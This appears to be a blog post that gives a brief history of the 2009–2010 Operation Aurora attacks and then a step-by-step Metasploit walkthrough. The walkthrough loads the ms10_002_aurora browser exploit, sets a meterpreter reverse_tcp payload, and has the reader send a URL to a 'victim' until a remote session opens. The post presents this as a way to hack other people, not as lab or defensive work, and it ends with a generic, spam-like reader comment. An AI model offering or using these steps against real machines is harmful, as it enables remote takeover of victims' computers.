Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo,Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.
Step 1. Open MetaSploit with msfconsole command
Step 2. Now Search Aurora.
Step 3. Use Below Commands :-
use exploit/windows/browser/ms10_002_aurora
options
Step 4. Not set payload :-
set payload windows/meterpreter/reverse_tcp
options
Step 5. Next, we need to set the LHOST and LPORT exactly like we did with the Linux web delivery exploit. And type run. Now an URL you should give to your victim.
Step 6. Open the Kali Linux ip on victim PC (Window PC/target PC) in browser
Step 7.When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
Step 8.
A meterpreter session open!
nmd
I would like to show my love for your generosity giving support to all those that must have assistance with this particular issue. Your special dedication to getting the message along became surprisingly important and has without exception empowered employees much like me to reach their ambitions. This informative publication signifies so much to me and especially to my mates. Many thanks; from all of us.
16-Sep-2019